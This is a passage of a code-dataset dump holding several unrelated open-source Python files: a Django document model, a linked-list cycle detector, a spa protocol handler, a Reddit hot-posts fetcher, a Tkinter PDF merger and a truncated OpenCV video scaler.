\"unencrypted\"\n STORAGE_TYPE_GPG = \"gpg\"\n STORAGE_TYPES = (\n (STORAGE_TYPE_UNENCRYPTED, \"Unencrypted\"),\n (STORAGE_TYPE_GPG, \"Encrypted with GNU Privacy Guard\")\n )\n\n correspondent = models.ForeignKey(\n Correspondent,\n blank=True,\n null=True,\n related_name=\"documents\",\n on_delete=models.SET_NULL\n )\n\n title = models.CharField(max_length=128, blank=True, db_index=True)\n\n content = models.TextField(\n db_index=True,\n blank=True,\n help_text=\"The raw, text-only data of the document. This field is \"\n \"primarily used for searching.\"\n )\n\n file_type = models.CharField(\n max_length=4,\n editable=False,\n choices=tuple([(t, t.upper()) for t in TYPES])\n )\n\n tags = models.ManyToManyField(\n Tag, related_name=\"documents\", blank=True)\n\n checksum = models.CharField(\n max_length=32,\n editable=False,\n unique=True,\n help_text=\"The checksum of the original document (before it was \"\n \"encrypted). We use this to prevent duplicate document \"\n \"imports.\"\n )\n\n created = models.DateTimeField(\n default=timezone.now, db_index=True)\n modified = models.DateTimeField(\n auto_now=True, editable=False, db_index=True)\n\n storage_type = models.CharField(\n max_length=11,\n choices=STORAGE_TYPES,\n default=STORAGE_TYPE_UNENCRYPTED,\n editable=False\n )\n\n added = models.DateTimeField(\n default=timezone.now, editable=False, db_index=True)\n\n class Meta:\n ordering = (\"correspondent\", \"title\")\n\n def __str__(self):\n created = self.created.strftime(\"%Y%m%d%H%M%S\")\n if self.correspondent and self.title:\n return \"{}: {} - {}\".format(\n created, self.correspondent, self.title)\n if self.correspondent or self.title:\n return \"{}: {}\".format(created, self.correspondent or self.title)\n return str(created)\n\n @property\n def source_path(self):\n\n file_name = \"{:07}.{}\".format(self.pk, self.file_type)\n if self.storage_type == self.STORAGE_TYPE_GPG:\n file_name += \".gpg\"\n\n return os.path.join(\n settings.MEDIA_ROOT,\n \"documents\",\n \"originals\",\n file_name\n )\n\n @property\n def source_file(self):\n return open(self.source_path, \"rb\")\n\n @property\n def file_name(self):\n return slugify(str(self)) + \".\" + self.file_type\n\n @property\n def download_url(self):\n return reverse(\"fetch\", kwargs={\"kind\": \"doc\", \"pk\": self.pk})\n\n @property\n def thumbnail_path(self):\n\n file_name = \"{:07}.png\".format(self.pk)\n if self.storage_type == self.STORAGE_TYPE_GPG:\n file_name += \".gpg\"\n\n return os.path.join(\n settings.MEDIA_ROOT,\n \"documents\",\n \"thumbnails\",\n file_name\n )\n\n @property\n def thumbnail_file(self):\n return open(self.thumbnail_path, \"rb\")\n\n @property\n def thumbnail_url(self):\n return reverse(\"fetch\", kwargs={\"kind\": \"thumb\", \"pk\": self.pk})\n\n\nclass Log(models.Model):\n\n LEVELS = (\n (logging.DEBUG, \"Debugging\"),\n (logging.INFO, \"Informational\"),\n (logging.WARNING, \"Warning\"),\n (logging.ERROR, \"Error\"),\n (logging.CRITICAL, \"Critical\"),\n )\n\n group = models.UUIDField(blank=True)\n message = models.TextField()\n level = models.PositiveIntegerField(choices=LEVELS, default=logging.INFO)\n created = models.DateTimeField(auto_now_add=True)\n modified = models.DateTimeField(auto_now=True)\n\n objects = LogManager()\n\n class Meta:\n ordering = (\"-modified\",)\n\n def __str__(self):\n return self.message\n\n def save(self, *args, **kwargs):\n \"\"\"\n To allow for the case where we don't want to group the message, we\n shouldn't force the caller to specify a one-time group value. 
However,\n allowing group=None means that the manager can't differentiate the\n different un-grouped messages, so instead we set a random one here.\n \"\"\"\n\n if not self.group:\n self.group = uuid.uuid4()\n\n models.Model.save(self, *args, **kwargs)\n\n\nclass FileInfo:\n\n # This epic regex *almost* worked for our needs, so I'm keeping it here for\n # posterity, in the hopes that we might find a way to make it work one day.\n ALMOST_REGEX = re.compile(\n r\"^((?P\\d\\d\\d\\d\\d\\d\\d\\d\\d\\d\\d\\d\\d\\dZ){separator})?\"\n r\"((?P{non_separated_word}+){separator})??\"\n r\"(?P{non_separated_word}+)\"\n r\"({separator}(?P<tags>[a-z,0-9-]+))?\"\n r\"\\.(?P<extension>[a-zA-Z.-]+)$\".format(\n separator=r\"\\s+-\\s+\",\n non_separated_word=r\"([\\w,. ]|([^\\s]-))\"\n )\n )\n\n formats = \"pdf|jpe?g|png|gif|tiff?|te?xt|md|csv\"\n REGEXES = OrderedDict([\n (\"created-correspondent-title-tags\", re.compile(\n r\"^(?P<created>\\d\\d\\d\\d\\d\\d\\d\\d(\\d\\d\\d\\d\\d\\d)?Z) - \"\n r\"(?P<correspondent>.*) - \"\n r\"(?P<title>.*) - \"\n r\"(?P<tags>[a-z0-9\\-,]*)\"\n r\"\\.(?P<extension>{})$\".format(formats),\n flags=re.IGNORECASE\n )),\n (\"created-title-tags\", re.compile(\n r\"^(?P<created>\\d\\d\\d\\d\\d\\d\\d\\d(\\d\\d\\d\\d\\d\\d)?Z) - \"\n r\"(?P<title>.*) - \"\n r\"(?P<tags>[a-z0-9\\-,]*)\"\n r\"\\.(?P<extension>{})$\".format(formats),\n flags=re.IGNORECASE\n )),\n (\"created-correspondent-title\", re.compile(\n r\"^(?P<created>\\d\\d\\d\\d\\d\\d\\d\\d(\\d\\d\\d\\d\\d\\d)?Z) - \"\n r\"(?P<correspondent>.*) - \"\n r\"(?P<title>.*)\"\n r\"\\.(?P<extension>{})$\".format(formats),\n flags=re.IGNORECASE\n )),\n (\"created-title\", re.compile(\n r\"^(?P<created>\\d\\d\\d\\d\\d\\d\\d\\d(\\d\\d\\d\\d\\d\\d)?Z) - \"\n r\"(?P<title>.*)\"\n r\"\\.(?P<extension>{})$\".format(formats),\n flags=re.IGNORECASE\n )),\n (\"correspondent-title-tags\", re.compile(\n r\"(?P<correspondent>.*) - \"\n r\"(?P<title>.*) - \"\n r\"(?P<tags>[a-z0-9\\-,]*)\"\n r\"\\.(?P<extension>{})$\".format(formats),\n flags=re.IGNORECASE\n )),\n (\"correspondent-title\", re.compile(\n r\"(?P<correspondent>.*) - \"\n r\"(?P<title>.*)?\"\n r\"\\.(?P<extension>{})$\".format(formats),\n flags=re.IGNORECASE\n )),\n (\"title\", re.compile(\n r\"(?P<title>.*)\"\n r\"\\.(?P<extension>{})$\".format(formats),\n flags=re.IGNORECASE\n ))\n ])\n\n def __init__(self, created=None, correspondent=None, title=None, tags=(),\n extension=None):\n\n self.created = created\n self.title = title\n self.extension = extension\n self.correspondent = correspondent\n self.tags = tags\n\n @classmethod\n def _get_created(cls, created):\n try:\n return dateutil.parser.parse(\"{:0<14}Z\".format(created[:-1]))\n except ValueError:\n return None\n\n @classmethod\n def _get_correspondent(cls, name):\n if not name:\n return None\n return Correspondent.objects.get_or_create(name=name, defaults={\n \"slug\": slugify(name)\n })[0]\n\n @classmethod\n def _get_title(cls, title):\n return title\n\n @classmethod\n def _get_tags(cls, tags):\n r = []\n for t in tags.split(\",\"):\n r.append(Tag.objects.get_or_create(\n slug=slugify(t),\n defaults={\"name\": t}\n )[0])\n return tuple(r)\n\n @classmethod\n def _get_extension(cls, extension):\n r = extension.lower()\n if r == \"jpeg\":\n return \"jpg\"\n if r == \"tif\":\n return \"tiff\"\n return r\n\n @classmethod\n def _mangle_property(cls, properties, name):\n if name in properties:\n properties[name] = getattr(cls, \"_get_{}\".format(name))(\n properties[name]\n )\n\n @classmethod\n def from_path(cls, path):\n \"\"\"\n 
We use a crude naming convention to make handling the correspondent,\n title, and tags easier:\n \"<date> - <correspondent> - <title> - <tags>.<suffix>\"\n \"<correspondent> - <title> - <tags>.<suffix>\"\n \"<correspondent> - <title>.<suffix>\"\n \"<title>.<suffix>\"\n \"\"\"\n\n for regex in cls.REGEXES.values():\n m = regex.match(os.path.basename(path))\n if m:\n properties = m.groupdict()\n cls._mangle_property(properties, \"created\")\n cls._mangle_property(properties, \"correspondent\")\n cls._mangle_property(properties, \"title\")\n cls._mangle_property(properties, \"tags\")\n cls._mangle_property(properties, \"extension\")\n return cls(**properties)\n", "repo_name": "madhavrn/paperless", "sub_path": "src/documents/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 14894, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.db.models.Model", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 25, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 40, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 40, "usage_type": "name"}, {"api_name": "django.db.models.SlugField", "line_number": 41, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 41, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 43, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 43, "usage_type": "name"}, {"api_name": "django.db.models.PositiveIntegerField", "line_number": 44, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 44, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 62, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 62, "usage_type": "name"}, {"api_name": "re.IGNORECASE", "line_number": 96, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 100, "usage_type": "call"}, {"api_name": "re.search", "line_number": 108, "usage_type": "call"}, {"api_name": "re.search", "line_number": 113, "usage_type": "call"}, {"api_name": "re.search", "line_number": 117, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 118, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 121, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 122, "usage_type": "call"}, {"api_name": "fuzzywuzzy.fuzz.partial_ratio", "line_number": 127, "usage_type": "call"}, {"api_name": "fuzzywuzzy.fuzz", "line_number": 127, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 141, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 142, "usage_type": "call"}, {"api_name": "django.utils.text.slugify", "line_number": 151, "usage_type": "call"}, {"api_name": "django.db.models.Model.save", "line_number": 153, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 153, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 153, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 160, "usage_type": "call"}, {"api_name": "django.db.models.PositiveIntegerField", "line_number": 184, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 184, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 187, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 187, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", 
"line_number": 207, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 207, "usage_type": "name"}, {"api_name": "django.db.models.SET_NULL", "line_number": 212, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 212, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 215, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 215, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 217, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 217, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 224, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 224, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 230, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 230, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 233, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 233, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 242, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 242, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 243, "usage_type": "attribute"}, {"api_name": "django.utils.timezone", "line_number": 243, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 244, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 244, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 247, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 247, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 254, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 254, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 255, "usage_type": "attribute"}, {"api_name": "django.utils.timezone", "line_number": 255, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 276, "usage_type": "call"}, {"api_name": "os.path", "line_number": 276, "usage_type": "attribute"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 277, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 277, "usage_type": "name"}, {"api_name": "django.utils.text.slugify", "line_number": 289, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 293, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 302, "usage_type": "call"}, {"api_name": "os.path", "line_number": 302, "usage_type": "attribute"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 303, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 303, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 315, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 318, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 318, "usage_type": "name"}, {"api_name": "logging.DEBUG", "line_number": 321, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 322, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 323, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 324, "usage_type": "attribute"}, {"api_name": "logging.CRITICAL", "line_number": 325, "usage_type": "attribute"}, 
{"api_name": "django.db.models.UUIDField", "line_number": 328, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 328, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 329, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 329, "usage_type": "name"}, {"api_name": "django.db.models.PositiveIntegerField", "line_number": 330, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 330, "usage_type": "name"}, {"api_name": "logging.INFO", "line_number": 330, "usage_type": "attribute"}, {"api_name": "django.db.models.DateTimeField", "line_number": 331, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 331, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 332, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 332, "usage_type": "name"}, {"api_name": "managers.LogManager", "line_number": 334, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 351, "usage_type": "call"}, {"api_name": "django.db.models.Model.save", "line_number": 353, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 353, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 353, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 360, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 372, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 373, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 379, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 381, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 386, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 388, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 393, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 395, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 399, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 401, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 406, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 408, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 412, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 414, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 417, "usage_type": "attribute"}, {"api_name": "dateutil.parser.parser.parse", "line_number": 433, "usage_type": "call"}, {"api_name": "dateutil.parser.parser", "line_number": 433, "usage_type": "attribute"}, {"api_name": "dateutil.parser", "line_number": 433, "usage_type": "name"}, {"api_name": "django.utils.text.slugify", "line_number": 442, "usage_type": "call"}, {"api_name": "django.utils.text.slugify", "line_number": 454, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 487, "usage_type": "call"}, {"api_name": "os.path", "line_number": 487, "usage_type": "attribute"}]} +{"seq_id": "37972106912", "text": "from typing import Optional\n\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\ndef detect_cycle(head: Optional[ListNode]) -> Optional[ListNode]:\n nodes_seen = set()\n node = head\n\n while node is not None:\n if node in nodes_seen:\n return node\n else:\n nodes_seen.add(node)\n node = node.next\n\n return None\n", "repo_name": "DmitryGubich/tasks", "sub_path": "tasks/06_2023/15/detect_cycle.py", "file_name": 
"detect_cycle.py", "file_ext": "py", "file_size_in_byte": 403, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "typing.Optional", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "42754526045", "text": "\"\"\" Gecko GETWC/WCGET/SETWC/WCSET/REQWC/WCREQ handlers \"\"\"\n\nimport logging\nimport struct\n\nfrom typing import Optional\n\nfrom ...config import GeckoConfig\nfrom .packet import GeckoPacketProtocolHandler\n\nGETWC_VERB = b\"GETWC\"\nWCGET_VERB = b\"WCGET\"\nSETWC_VERB = b\"SETWC\"\nWCSET_VERB = b\"WCSET\"\nREQWC_VERB = b\"REQWC\"\nWCREQ_VERB = b\"WCREQ\"\nWCERR_VERB = b\"WCERR\"\n\n\nGET_WATERCARE_FORMAT = \">B\"\nSET_WATERCARE_FORMAT = \">BB\"\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass GeckoWatercareProtocolHandler(GeckoPacketProtocolHandler):\n @staticmethod\n def request(seq, **kwargs):\n return GeckoWatercareProtocolHandler(\n content=b\"\".join([GETWC_VERB, struct.pack(\">B\", seq)]),\n timeout=GeckoConfig.PROTOCOL_TIMEOUT_IN_SECONDS,\n retry_count=GeckoConfig.PROTOCOL_RETRY_COUNT,\n on_retry_failed=GeckoPacketProtocolHandler._default_retry_failed_handler,\n **kwargs,\n )\n\n @staticmethod\n def set(seq, mode, **kwargs):\n return GeckoWatercareProtocolHandler(\n content=b\"\".join(\n [SETWC_VERB, struct.pack(SET_WATERCARE_FORMAT, seq, mode)]\n ),\n timeout=GeckoConfig.PROTOCOL_TIMEOUT_IN_SECONDS,\n retry_count=GeckoConfig.PROTOCOL_RETRY_COUNT,\n **kwargs,\n )\n\n @staticmethod\n def response(mode, **kwargs):\n return GeckoWatercareProtocolHandler(\n content=b\"\".join(\n [\n WCGET_VERB,\n struct.pack(\n GET_WATERCARE_FORMAT,\n mode,\n ),\n ]\n ),\n **kwargs,\n )\n\n @staticmethod\n def giveschedule(**kwargs):\n return GeckoWatercareProtocolHandler(\n content=b\"\".join(\n [\n WCREQ_VERB,\n b\"\\x00\\x00\\x00\\x01\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x02\\x01\\x00\\x01\\x05\"\n b\"\\x06\\x00\\x12\\x00\\x03\\x01\\x00\\x00\\x06\\x06\\x00\\x12\\x00\\x04\\x01\\x00\"\n b\"\\x01\\x05\\x00\\x00\\x00\\x00\",\n ]\n ),\n **kwargs,\n )\n\n def __init__(self, **kwargs) -> None:\n super().__init__(**kwargs)\n self.mode: Optional[int] = None\n self.schedule = False\n\n def can_handle(self, received_bytes: bytes, sender: tuple) -> bool:\n return (\n received_bytes.startswith(GETWC_VERB)\n or received_bytes.startswith(WCGET_VERB)\n or received_bytes.startswith(REQWC_VERB)\n or received_bytes.startswith(WCSET_VERB)\n )\n\n def handle(self, received_bytes: bytes, sender: tuple) -> None:\n remainder = received_bytes[5:]\n if received_bytes.startswith(GETWC_VERB):\n self._sequence = struct.unpack(\">B\", remainder)[0]\n self.schedule = False\n return # Stay in the handler list\n if received_bytes.startswith(REQWC_VERB):\n self._sequence = struct.unpack(\">B\", remainder)[0]\n self.schedule = True\n return # Stay in the handler list\n if received_bytes.startswith(WCGET_VERB):\n self.mode = struct.unpack(GET_WATERCARE_FORMAT, remainder)[0]\n self.schedule = False\n # Otherwise must be WCSET\n self._should_remove_handler = True\n\n\nclass GeckoWatercareErrorHandler(GeckoPacketProtocolHandler):\n def can_handle(self, received_bytes: bytes, sender: tuple) -> bool:\n return received_bytes.startswith(WCERR_VERB)\n\n def handle(self, received_bytes: bytes, sender: tuple):\n pass\n", "repo_name": "gazoodle/geckolib", "sub_path": "src/geckolib/driver/protocol/watercare.py", "file_name": "watercare.py", "file_ext": "py", "file_size_in_byte": 3584, "program_lang": "python", "lang": "en", "doc_type": "code", 
"stars": 52, "dataset": "github-code", "pt": "86", "api": [{"api_name": "logging.getLogger", "line_number": 23, "usage_type": "call"}, {"api_name": "packet.GeckoPacketProtocolHandler", "line_number": 26, "usage_type": "name"}, {"api_name": "struct.pack", "line_number": 30, "usage_type": "call"}, {"api_name": "config.GeckoConfig.PROTOCOL_TIMEOUT_IN_SECONDS", "line_number": 31, "usage_type": "attribute"}, {"api_name": "config.GeckoConfig", "line_number": 31, "usage_type": "name"}, {"api_name": "config.GeckoConfig.PROTOCOL_RETRY_COUNT", "line_number": 32, "usage_type": "attribute"}, {"api_name": "config.GeckoConfig", "line_number": 32, "usage_type": "name"}, {"api_name": "packet.GeckoPacketProtocolHandler._default_retry_failed_handler", "line_number": 33, "usage_type": "attribute"}, {"api_name": "packet.GeckoPacketProtocolHandler", "line_number": 33, "usage_type": "name"}, {"api_name": "struct.pack", "line_number": 41, "usage_type": "call"}, {"api_name": "config.GeckoConfig.PROTOCOL_TIMEOUT_IN_SECONDS", "line_number": 43, "usage_type": "attribute"}, {"api_name": "config.GeckoConfig", "line_number": 43, "usage_type": "name"}, {"api_name": "config.GeckoConfig.PROTOCOL_RETRY_COUNT", "line_number": 44, "usage_type": "attribute"}, {"api_name": "config.GeckoConfig", "line_number": 44, "usage_type": "name"}, {"api_name": "struct.pack", "line_number": 54, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 79, "usage_type": "name"}, {"api_name": "struct.unpack", "line_number": 93, "usage_type": "call"}, {"api_name": "struct.unpack", "line_number": 97, "usage_type": "call"}, {"api_name": "struct.unpack", "line_number": 101, "usage_type": "call"}, {"api_name": "packet.GeckoPacketProtocolHandler", "line_number": 107, "usage_type": "name"}]} +{"seq_id": "577098699", "text": "#!/usr/bin/python3\n\"\"\"prints the titles of the first 10 hot posts listed for a given subreddit\nIf not a valid subreddit, print None.\"\"\"\n\nfrom requests import get\n\n\ndef top_ten(subreddit):\n \"\"\"prints the titles of the first 10 hot posts listed for a given subreddit\n\n Args:\n subreddit (str): the subreddit to be queried\n \"\"\"\n\n try:\n base_url =\\\n f'https://www.reddit.com/r/{subreddit}/hot.json?limit=10'\n request = get(base_url,\n headers={\n 'user-agent': 'learn api by Careful_Reality8307'\n })\n if request.is_redirect:\n return\n [print(i['data']['title']) for i in request.json()['data']['children']]\n except Exception:\n print('None')\n", "repo_name": "mdesignscode/alx-system_engineering-devops", "sub_path": "0x16-api_advanced/1-top_ten.py", "file_name": "1-top_ten.py", "file_ext": "py", "file_size_in_byte": 779, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "requests.get", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "6725072293", "text": "import tkinter.messagebox\nimport tkinter as tk\nfrom tkinter import filedialog as fd\nfrom PyPDF2 import PdfMerger, PdfReader #引入\n\n# step1: select the files to be processed(default order)\ndef select():\n global file_s\n file_s=fd.askopenfilenames(filetypes=[(\"pdf文件\",\".pdf\")])\n if file_s!='':\n pic_in.set(file_s)\n button_out['state']='normal'\n return None\n\n# step2: select the folder to output the pdf file\ndef select_out():\n global path_save\n path_save=fd.askdirectory()\n if path_save!='':\n pdf_out.set(path_save)\n button_on['state']='normal'\n\n# step3: write the pictures into a pdf\ndef combine():\n file_merger = PdfMerger(strict=False)\n 
path=path_save+\"/combine_result.pdf\"\n for pdf in file_s:\n file_merger.append(PdfReader(pdf), 'tag')\n file_merger.add_metadata(\n {u'/Title': u'my title', u'/Creator': u'creator', '/Subject': 'subjects'})\n with open(path, 'wb+') as fa:\n file_merger.write(fa)\n tkinter.messagebox.showinfo('Successfully operated!')\n fa.close()\n file_merger.close()\n return None\n\n# GUI initialize\ndef main(root3):\n global pic_in, pdf_out, on, entry_out, button_out, button_on\n pic_in = tk.StringVar()\n pdf_out = tk.StringVar()\n on = tk.StringVar()\n label_input = tk.Label(root3, text='①选择要合并的pdf:')\n entry_input = tk.Entry(root3, textvariable=pic_in, width=45)\n button_input = tk.Button(root3, text='①选择要合并的pdf', command=select)\n label_out = tk.Label(root3, text='②选择输出文件夹:(输出结果为该文件夹下的combine_result.pdf)')\n entry_out = tk.Entry(root3, textvariable=pdf_out, width=45)\n button_out = tk.Button(root3, text='②选择保存位置', command=select_out)\n button_out['state'] = 'disabled'\n button_on = tk.Button(root3, text='③执行', command=combine, width=20, height=3)\n button_on['state'] = 'disabled'\n label_input.place(x=10,y=10)\n entry_input.place(x=10, y=35)\n button_input.place(x=350, y=32)\n label_out.place(x=10, y=80)\n entry_out.place(x=10, y=105)\n button_out.place(x=350, y=97)\n button_on.place(x=150, y=150)\n \nglobal pic_in, pdf_out, on, entry_out, button_out, button_on\n \nroot2 = tk.Tk()\nsw = root2.winfo_screenwidth()\nsh = root2.winfo_screenheight()\nc = (sw - 400) / 2\nd = (sh - 300) / 2\nroot2.geometry('500x300+%d+%d'%(c, d))\nroot2.title('PDF合并')\nroot2.resizable(width=False, height=False)\nroot = tk.Frame(root2, width=605, height=500)\nroot.place(x=0, y=0)\n\nmain(root)\nroot2.mainloop()\r\n", "repo_name": "WampB/PDF_tools", "sub_path": "PDF_combine_GUI.py", "file_name": "PDF_combine_GUI.py", "file_ext": "py", "file_size_in_byte": 2561, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "tkinter.filedialog.askopenfilenames", "line_number": 9, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 9, "usage_type": "name"}, {"api_name": "tkinter.filedialog.askdirectory", "line_number": 18, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 18, "usage_type": "name"}, {"api_name": "PyPDF2.PdfMerger", "line_number": 25, "usage_type": "call"}, {"api_name": "PyPDF2.PdfReader", "line_number": 28, "usage_type": "call"}, {"api_name": "tkinter.messagebox.messagebox.showinfo", "line_number": 33, "usage_type": "call"}, {"api_name": "tkinter.messagebox.messagebox", "line_number": 33, "usage_type": "attribute"}, {"api_name": "tkinter.messagebox", "line_number": 33, "usage_type": "name"}, {"api_name": "tkinter.StringVar", "line_number": 41, "usage_type": "call"}, {"api_name": "tkinter.StringVar", "line_number": 42, "usage_type": "call"}, {"api_name": "tkinter.StringVar", "line_number": 43, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 44, "usage_type": "call"}, {"api_name": "tkinter.Entry", "line_number": 45, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 46, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 47, "usage_type": "call"}, {"api_name": "tkinter.Entry", "line_number": 48, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 49, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 51, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 63, "usage_type": "call"}, {"api_name": 
"tkinter.Frame", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "22195127676", "text": "import cv2 as cv\nfrom cv2 import INTER_AREA\nfrom cv2 import INTER_LINEAR\nfrom cv2 import INTER_CUBIC\nfrom matplotlib.pyplot import sca\nimport numpy as np\n\n\nvideo = input(\"Type either 'livefeed' or 'file': \")\nscale = input(\"Please enter a scale factor (value from 0-1: \")\ninterpolation = input(\"Type one digit of the following, 1 = Inter_Area, 2 = Linear, 3 = Cubic: \")\n\ndef scale_frame(frame, scale):\n # read the actual height and weight, scale it and store\n height = (frame.shape[0]*scale)\n width = (frame.shape[1]*scale)\n \n\n #return the scaled frame\n \n if interpolation == '1':\n return cv.resize(frame, (150, 150), (255,255), fx = 250, fy=250, interpolation=cv.INTER_AREA) # performs rescaling by area interpolation\n elif interpolation == '2':\n return cv.resize(frame, (150, 150), (255,255), fx = 250, fy=250, interpolation=cv.INTER_LINEAR) # performs rescaling by linear interpolation\n elif interpolation == '3':\n return cv.resize(frame, (150, 150), (255,255), fx = 250, fy=250, interpolation=cv.INTER_CUBIC) # performs rescaling by cubic interpolation\n\nif video == 'livefeed':\n video_location = 0\n def read_video(video_location, scale, side_by_side=False):\n \n if scale != 1 and scale != 0: \n try:\n capture = cv.VideoCapture(video_location)\n while True:\n isTrue, frame = capture.read()\n scaled_frame = scale_frame(frame, scale) # calls the scale_frame function to scale each frame \n \n cv.imshow('scaled video', scaled_frame)\n if side_by_side:\n cv.imshow('original video', frame)\n \n if cv.waitKey(20) & 0XFF == ord('d'):\n break\n capture.release()\n \n \n finally:\n cv.destroyAllWindows()\n else:\n print(f'The scale factor {scale} is not valid !!')\n read_video(video_location=0,scale=scale,side_by_side=False)\n\nelif(video == 'file'):\n video_location = input(\"Please enter the location of your video file: \")\n def read_video(source, scale, side_by_side=False):\n if scale != 1 and scale > 0: \n try:\n capture = cv.VideoCapture(source)\n while True:\n isTrue, frame = capture.read()\n scaled_frame = scale_frame(frame, scale) # calls the scale_frame function to scale each frame \n \n cv.imshow('scaled video', scaled_frame)\n if side_by_side:\n cv.imshow('original video', frame)\n \n if cv.waitKey(20) & 0XFF == ord('d'):\n break\n capture.release()\n except:\n print('error')\n finally:\n cv.destroyAllWindows()\n else:\n print(f'The scale factor {scale} is not valid !!')", "repo_name": 